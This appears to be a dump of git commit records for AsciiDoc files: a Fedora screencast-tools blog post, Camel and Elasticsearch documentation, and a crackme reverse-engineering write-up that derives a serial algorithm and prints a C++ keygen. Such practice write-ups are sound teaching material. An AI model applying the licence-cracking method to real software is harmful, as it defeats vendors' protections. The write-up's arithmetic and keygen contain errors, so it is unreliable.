source software in a specific niche: screencast creation, and video editing.\n\n=== Background\n\nA couple of months back, I started recording screencasts about Red Hat products.footnote:[I work as a solution architect for Red Hat in the Benelux region]. For now, it's mostly about management products, like Satellite, Ansible Tower and things like that, but I'll potentially also cover other products and projects as they pop up in my daily work, and as said above, I intend to start sharing some experiences.footnote:[How-to's, why this and not that, and who knows: screencasts ;)] about creating screencasts on Fedora.\n\nAssuming more people are trying to figure out the same things I am, I'm starting off with a short write-up of my experiences so far, trying to work with open source software to create screencasts. Spoiler: it's not as easy as I hoped it would be. \n\nThe below article is based on my experience using Fedora 25.\n\n\n=== Recording video\n\nEver since I started doing this, I've been using http:\/\/screencastify.com\/[Screencastify] as my screen recorder of choice. I have tried using the https:\/\/extensions.gnome.org\/extension\/690\/easyscreencast\/[EasyScreencast] Gnome Shell extension in the beginning, but it had (temporarily) died, so that didn't seem viable. It seems to have revived though, so I'll probably try it again when my Screencastify subscription expires near the end of the calendar year.\n\nI also tried the https:\/\/help.gnome.org\/users\/gnome-help\/stable\/screen-shot-record.html.en[CTRL-ALT-SHIFT-R] option to start a screencast recording in Gnome, but that records both my monitors, which makes editing the whole thing into a Youtube video quite a pain.footnote:[If you know who to limit this to a single monitor, or even better: a single window, I'm all ears!].\n\nFinally, gtk-recordmydesktop gives me all kinds of strange artifacts in my recording when I move my mouse. It also seemed to crash quite frequently, and seems to be dead upstream.\n\nAll options available from the community (the built-in one, gtk-recordmydesktop and EasyScreencast) were disqualified for various reasons, either because of lack of maintenance, quircks or instability.\n\nHowever, apart from the occasional crash (which happens very seldomly), Screencastify works beautifully. I can record a window, a Chrome tab, or my whole desktop. Recording my voice over the videos also works pretty well, using a USB microphone I bought for the purpose of creating screencasts.\n\nThe downside of Screencastify is that it's a proprietary piece of software. For now, it's the clear winner, but in the future I'll give EasyScreencast a go for it's money again.\n\n\n=== Recording audio on it's own\n\nRecording audio on Fedora can be done through various options, of which the two most obvious are https:\/\/wiki.gnome.org\/Design\/Apps\/SoundRecorder[Sound Recorder] and http:\/\/www.audacityteam.org\/[Audacity].\n\nSound Recorder is the default sound recorder app in Gnome 3. It's OK for very simple usage, but the moment you want to start editing audio or improving audio quality using filters, Sound Recorder doesn't offer anything.\n\nAudacity on the contrary, is *very* complete. It's even a bit intimidating in the amount of options it offers, but in terms of recording quality, editing the recordings and improving their quality, Audacity is the de-facto standard in open source, on Linux as well as on various other platforms. Simply said, it's brilliant.\n\nAudacity is the clear winner hear, without any real competition.\n\n\n=== Editing video\n\nSo this is where the real pain starts. Save to say, video editing on Linux was a bit of a disappointment for me.\n\nI have tried all of the major video editing open source projects that available natively on Fedora: Kdenlive, Pitivi, Avidemux and OpenShot, as well as the commercially available Lightworks.\n\nTo start with http:\/\/fixounet.free.fr\/avidemux\/[Avidemux]: it seems to lack the full broad spectrum of features one would need to edit and merge large amounts of clips into a new video, and insert transitions and background audio. I assume it would work nicely to just crop two videos and slam them together, but it doesn't feel right for more complex things. Granted, I haven't spent a huge amount with this program, so let me know if you think I'm dismissing Avidemux too easily. It just wasn't enough for me.\n\nNext up are http:\/\/www.openshot.org\/[OpenShot] and https:\/\/kdenlive.org\/[Kdenlive]. Both great programs, both with extensive feature sets that would suffice for me and both with the same continuous problem that disqualified them: they crash. Over and over. I'll be filing bugs for both, but no matter how that turns out, right NOW, they are not very useful for me. Both seem to have somewhat lively upstreams tho, so who knows what the future might bring. \n\nSadly, I've spent too much time trying to get OpenShoft and Kdenlive to work, and that kept me from thoroughly evaluating my next contender: https:\/\/git.gnome.org\/browse\/pitivi[Pitivi].\n\nPitivi used to fall into the same category as OpenShoft and Kdenlive (crashing), but I haven't experienced any crashes recently. I comes with a nice set of effects, just like OpenShoft and Kdenlive, and is fairly easy to use. It exports to all of the right formats, but sadly, rendering of video happens in the foreground. This blocksyou from using the program during that process. Not a big deal for a video of a couple of minutes, but annoying for anything longer than that.\n\nThe final program I just had to take a look at, is Lightworks. It's not open source, but it really is bloody good. It's by far the most complete of the lot, but it comes at a hefty price. Also, some of the options that are really interesting for making screencasts, like a built-in voice-over recorder, isn't available on Linux :(\n\nI would say for video editing, Pitivi and Lightworks are tied, with Lightworks being the more complete option, and Pitivi being the open source one.\n\n\n=== Conclusion\n\nAudio editing we have under control in open source. Audacity is great. It's just really, really great. (There, enough Trumpianisms for today.)\n\nScreencast recording has come a long way, but hasn't quite reached the level of functionality I needed a couple of months back. It might have grown to that level in the meantime, though. I'll take the time to re-evaluate EasyScreencast and post an update sometime in the Fall.\n\nVideo editing is still a bit of a problem. The commercial option is good, but pretty expensive and obviously not open source. Two of the three main contenders (OpenShot and Kdenlive) have serious stability issues, up to the point that I just gave up on them. Bugs will be filed, but that's not helping me today. Pitivi is a little less complete than both OpenShot and Kdenlive, I think, but does show promise (and doesn't crash that often). \n\nAs with EasyScreencast, I'll give Pitivi as second try and hopefully find an open source solution for my video editing problem.\n\nTL;DR if you are looking for a set of tools to record and edit screencasts on Fedora, you probably want to check out EasyScreencast, and use Screencastify as a fall-back option. For audio, there's no way around Audacity. If you can shell out some dough and don't mind a bit of proprietary software, go for Lightworks, otherwise Pitivi will help you overcome most video editing problems.\n\nM\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4a0e3ed09ca3cf9d90ab715d35f970dcf75454f0","subject":"Update 2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","message":"Update 2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","repos":"reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io","old_file":"_posts\/2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","new_file":"_posts\/2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","new_contents":"= Reverse Engineering Crackme_v2 Write Up.\n\nCrackmes are free, reverse engineering challanges made by reversers for others practice their skill. They're also a great way to demonstrate skill for a portfolio.\n\n=== First Impressions:\n\nA quick run of the program shows us that it's a command line program. The crackme outputs some strings and takes 2 inputs: serial, and name. \n\nimage::http:\/\/imgur.com\/GrpOB7j.png[]\n\nThe readme.txt file tells us that the crackme is written in C++ and our goal is to write a keygen, not patch the software.\n\nA quick PEiD scan detects no packer\/crypter signatures.\n\nimage::http:\/\/imgur.com\/z9tJiMs.png[]\n\n\nOpening in IDA shows us the code the same strings that we saw in the command line being passed to std:cout and name and serial being comming from std:cin being stored in `var_108` and `var_208` respectivley. I'll rename those variables `szName` and `szSerial`.\n\nimage::http:\/\/imgur.com\/UdRo9CK.png[]\n\n=== Reverse Engineering Serial Checking Algorithem:\n\nimage::http:\/\/imgur.com\/usthcIT.png[]\n\nYou can see in the image above (still in the main function, just scrolled down a little) that this crackme's has only one conditional branch that leads to either ``\"Error : : Not a correct Serial\\n\"` and `\"Correct : : Good Work\\n\"`.\n\n\nThe code leading up the `cmp` and `jmp` that make that conditional branch will be the algorithem that checks to see if the serial and name are correct. Let's have a look at it, shall we:\n\n\nFirst the length of `szName` is determined with `strlen()`:\n\n....\nlea eax, [ebp+szName]\nmov [esp], eax ; char *\ncall _strlen\n....\n\nNext the length is multiplied by `0x875CD` (554445d) and again by `0x51eb851f` (1374389535d) but this time the result goes into the `edx:edx` register pair. `eax` is them moved into `edx`, nulling the least significant half of the quad word, effectively dividing by `0x64` which is 2**32:\n\n....\nmov edx, eax\nimul edx, 875CDh\nmov eax, 51EB851Fh\nmul edx\nmov eax, edx\n....\n\nShift right is used to divide by 2**5, ie 32:\n\n....\nshr eax, 5\n....\n\nThen multiplication by `0x0FFFFFC90` which is -880d:\n\n....\nimul eax, 0FFFFFC90h\n....\n\nNext `_sprintf` is used to convert the floating point into a string with \"-x019871\" appended to it. Eg: -50.0 becomes \"-50-x019871\". This is what the serial needs to be. If you were stepping though with a debugger then you would see desired serial in `var_308`.\n\n....\nmov edx, 0\npush edx\npush eax\nfild qword ptr [esp]\nlea esp, [esp+8]\nfstp [ebp+var_410]\nfld [ebp+var_410]\nfstp qword ptr [esp+8]\nmov dword ptr [esp+4], offset aIX019871 ; \"%i-x019871\"\nlea eax, [ebp+var_308]\nmov [esp], eax ; char *\ncall _sprintf\n....\n\n....\nlea eax, [ebp+var_308]\nmov [esp+4], eax ; char *\nlea eax, [ebp+szSerial]\nmov [esp], eax ; char *\ncall _strcmp\nmov [ebp+var_414], eax\ncmp [ebp+var_414], 0\njz short loc_401719\n....\n\nPutting that all together we get the following equation:\n\n....\nint2str(((((strlen(name) * 554445) * 1374389535 ) \/(2**32)) \/32 ) * -880) + \"-x019871\"\n....\n\nA bit of maths....\n\n....\n1374389535\/(2**32)\/32\n=1\/100\n....\n\ncan simplify the equation into: \n\n....\n((strlen(name) * 554445 \/ 100) * -880)\n....\n\nAnd there's our keygen algorithem. We could just get the output of sprintf or type up a keygen in our language of choosing.\n\n....\n#include <iostream>\n#include <iomanip>\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n\nusing namespace std;\n\nint main(int argc, char *argv[]) {\n char name[100];\n double serial_number;\n\t\n cout << \"name: \";\n cin >> setw(sizeof name) >> name;\n\t\n serial_number = (long double)(-880 * (554445 * strlen(name) \/ 0x64));\n\t\n printf(\"%i-x019871\\n\", serial_number);\n \/\/cout << \"Hellow world\" << endl;\n\t\n system(\"pause\");\n return 0;\n}\n....","old_contents":"= Reverse Engineering Crackme_v2 Write Up.\n\n=== First Impressions:\n\nA quick run of the program shows us that it's a command line program. The crackme outputs some strings and takes 2 inputs: serial, and name. \n\nimage::http:\/\/imgur.com\/GrpOB7j.png[]\n\nThe readme.txt file tells us that the crackme is written in C++ and our goal is to write a keygen, not patch the software.\n\nA quick PEiD scan detects no packer\/crypter signatures.\n\nimage::http:\/\/imgur.com\/z9tJiMs.png[]\n\n\nOpening in IDA shows us the code the same strings that we saw in the command line being passed to std:cout and name and serial being comming from std:cin being stored in `var_108` and `var_208` respectivley. I'll rename those variables `szName` and `szSerial`.\n\nimage::http:\/\/imgur.com\/UdRo9CK.png[]\n\n=== Reverse Engineering Serial Checking Algorithem:\n\nimage::http:\/\/imgur.com\/usthcIT.png[]\n\nYou can see in the image above (still in the main function, just scrolled down a little) that this crackme's has only one conditional branch that leads to either ``\"Error : : Not a correct Serial\\n\"` and `\"Correct : : Good Work\\n\"`.\n\n\nThe code leading up the `cmp` and `jmp` that make that conditional branch will be the algorithem that checks to see if the serial and name are correct. Let's have a look at it, shall we:\n\n\nFirst the length of `szName` is determined with `strlen()`:\n\n....\nlea eax, [ebp+szName]\nmov [esp], eax ; char *\ncall _strlen\n....\n\nNext the length is multiplied by `0x875CD` (554445d) and again by `0x51eb851f` (1374389535d) but this time the result goes into the `edx:edx` register pair. `eax` is them moved into `edx`, nulling the least significant half of the quad word, effectively dividing by `0x64` which is 2**32:\n\n....\nmov edx, eax\nimul edx, 875CDh\nmov eax, 51EB851Fh\nmul edx\nmov eax, edx\n....\n\nShift right is used to divide by 2**5, ie 32:\n\n....\nshr eax, 5\n....\n\nThen multiplication by `0x0FFFFFC90` which is -880d:\n\n....\nimul eax, 0FFFFFC90h\n....\n\nNext `_sprintf` is used to convert the floating point into a string with \"-x019871\" appended to it. Eg: -50.0 becomes \"-50-x019871\". This is what the serial needs to be. If you were stepping though with a debugger then you would see desired serial in `var_308`.\n\n....\nmov edx, 0\npush edx\npush eax\nfild qword ptr [esp]\nlea esp, [esp+8]\nfstp [ebp+var_410]\nfld [ebp+var_410]\nfstp qword ptr [esp+8]\nmov dword ptr [esp+4], offset aIX019871 ; \"%i-x019871\"\nlea eax, [ebp+var_308]\nmov [esp], eax ; char *\ncall _sprintf\n....\n\n....\nlea eax, [ebp+var_308]\nmov [esp+4], eax ; char *\nlea eax, [ebp+szSerial]\nmov [esp], eax ; char *\ncall _strcmp\nmov [ebp+var_414], eax\ncmp [ebp+var_414], 0\njz short loc_401719\n....\n\nPutting that all together we get the following equation:\n\n....\nint2str(((((strlen(name) * 554445) * 1374389535 ) \/(2**32)) \/32 ) * -880) + \"-x019871\"\n....\n\nA bit of maths....\n\n....\n1374389535\/(2**32)\/32\n=1\/100\n....\n\ncan simplify the equation into: \n\n....\n((strlen(name) * 554445 \/ 100) * -880)\n....\n\nAnd there's our keygen algorithem. We could just get the output of sprintf or type up a keygen in our language of choosing.\n\n....\n#include <iostream>\n#include <iomanip>\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n\nusing namespace std;\n\nint main(int argc, char *argv[]) {\n char name[100];\n double serial_number;\n\t\n cout << \"name: \";\n cin >> setw(sizeof name) >> name;\n\t\n serial_number = (long double)(-880 * (554445 * strlen(name) \/ 0x64));\n\t\n printf(\"%i-x019871\\n\", serial_number);\n \/\/cout << \"Hellow world\" << endl;\n\t\n system(\"pause\");\n return 0;\n}\n....","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8aa0bad0614fc08345dd5b373272876f47b1bd0a","subject":"Regen docs","message":"Regen docs\n","repos":"pax95\/camel,CodeSmell\/camel,adessaigne\/camel,cunningt\/camel,ullgren\/camel,ullgren\/camel,nikhilvibhav\/camel,tdiesler\/camel,christophd\/camel,alvinkwekel\/camel,tdiesler\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,nicolaferraro\/camel,gnodet\/camel,apache\/camel,gnodet\/camel,CodeSmell\/camel,ullgren\/camel,DariusX\/camel,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,christophd\/camel,nicolaferraro\/camel,alvinkwekel\/camel,objectiser\/camel,pax95\/camel,nicolaferraro\/camel,adessaigne\/camel,nicolaferraro\/camel,tdiesler\/camel,DariusX\/camel,nikhilvibhav\/camel,tadayosi\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,pmoerenhout\/camel,pax95\/camel,DariusX\/camel,apache\/camel,tdiesler\/camel,pmoerenhout\/camel,pmoerenhout\/camel,zregvart\/camel,gnodet\/camel,tadayosi\/camel,tadayosi\/camel,CodeSmell\/camel,cunningt\/camel,objectiser\/camel,apache\/camel,apache\/camel,tdiesler\/camel,cunningt\/camel,nikhilvibhav\/camel,mcollovati\/camel,DariusX\/camel,adessaigne\/camel,christophd\/camel,pmoerenhout\/camel,pax95\/camel,zregvart\/camel,zregvart\/camel,adessaigne\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,objectiser\/camel,ullgren\/camel,pax95\/camel,apache\/camel,objectiser\/camel,tdiesler\/camel,alvinkwekel\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,mcollovati\/camel,cunningt\/camel,mcollovati\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/openshift-builds-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/openshift-builds-component.adoc","new_contents":"[[openshift-builds-component]]\n= Openshift Builds Component\n:page-source: components\/camel-kubernetes\/src\/main\/docs\/openshift-builds-component.adoc\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Builds component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes build operations.\n\n\n== Component Options\n\n\/\/ component options: START\nThe Openshift Builds component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Openshift Builds endpoint is configured using URI syntax:\n\n----\nopenshift-builds:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (22 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (producer) | The Kubernetes API Version to use | | String\n| *dnsDomain* (producer) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (producer) | Default KubernetesClient to use if provided | | KubernetesClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *portName* (producer) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (producer) | The port protocol, used for ServiceCall EIP | tcp | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n\/\/ spring-boot-auto-configure options: START\n\/\/ spring-boot-auto-configure options: END\n\n== Supported producer operation\n\n- listBuilds\n- listBuildsByLabels\n- getBuild\n\n== Openshift Builds Producer Examples\n\n- listBuilds: this operation list the Builds on an Openshift cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:list\").\n toF(\"openshift-builds:\/\/\/?kubernetesClient=#kubernetesClient&operation=listBuilds\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Builds from your Openshift cluster\n\n- listBuildsByLabels: this operation list the builds by labels on an Openshift cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listByLabels\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n Map<String, String> labels = new HashMap<>();\n labels.put(\"key1\", \"value1\");\n labels.put(\"key2\", \"value2\");\n exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_BUILDS_LABELS, labels);\n }\n });\n toF(\"openshift-builds:\/\/\/?kubernetesClient=#kubernetesClient&operation=listBuildsByLabels\").\n to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation return a List of Builds from your cluster, using a label selector (with key1 and key2, with value value1 and value2)\n","old_contents":"[[openshift-builds-component]]\n= Openshift Builds Component\n:page-source: components\/camel-kubernetes\/src\/main\/docs\/openshift-builds-component.adoc\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Builds component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes build operations.\n\n\n== Component Options\n\n\/\/ component options: START\nThe Openshift Builds component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Openshift Builds endpoint is configured using URI syntax:\n\n----\nopenshift-builds:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (22 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (producer) | The Kubernetes API Version to use | | String\n| *dnsDomain* (producer) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (producer) | Default KubernetesClient to use if provided | | KubernetesClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *portName* (producer) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (producer) | The port protocol, used for ServiceCall EIP | tcp | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n\/\/ spring-boot-auto-configure options: START\n\/\/ spring-boot-auto-configure options: END\n\n== Supported producer operation\n\n- listBuilds\n- listBuildsByLabels\n- getBuild\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21ffff379b920821e73485b375c663b931f4227","subject":"Docs: Hunspell tidied","message":"Docs: Hunspell tidied\n\nTidied some formatting","repos":"aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_contents":"[[analysis-hunspell-tokenfilter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(defaults to `<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold both the `*.aff` and `*.dic`\nfiles (all of which will automatically be picked up). For example,\nassuming the default hunspell location is used, the following directory\nlayout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nThe location of the hunspell directory can be configured using the\n`indices.analysis.hunspell.dictionary.location` settings in\n_elasticsearch.yml_.\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`:: \n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`:: \n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`:: \n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`:: \n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`:: \n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","old_contents":"[[analysis-hunspell-tokenfilter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(defaults to `<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold both the \\*.aff and \\*.dic\nfiles (all of which will automatically be picked up). For example,\nassuming the default hunspell location is used, the following directory\nlayout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nThe location of the hunspell directory can be configured using the\n`indices.analysis.hunspell.dictionary.location` settings in\n_elasticsearch.yml_.\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`:: \n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`:: \n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`:: \n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`:: \n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`:: \n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3536935b2995366abe18a39b444500897d0513e","subject":"[DOCS] Adds inference phase to get DFA job stats. (#60737)","message":"[DOCS] Adds inference phase to get DFA job stats. 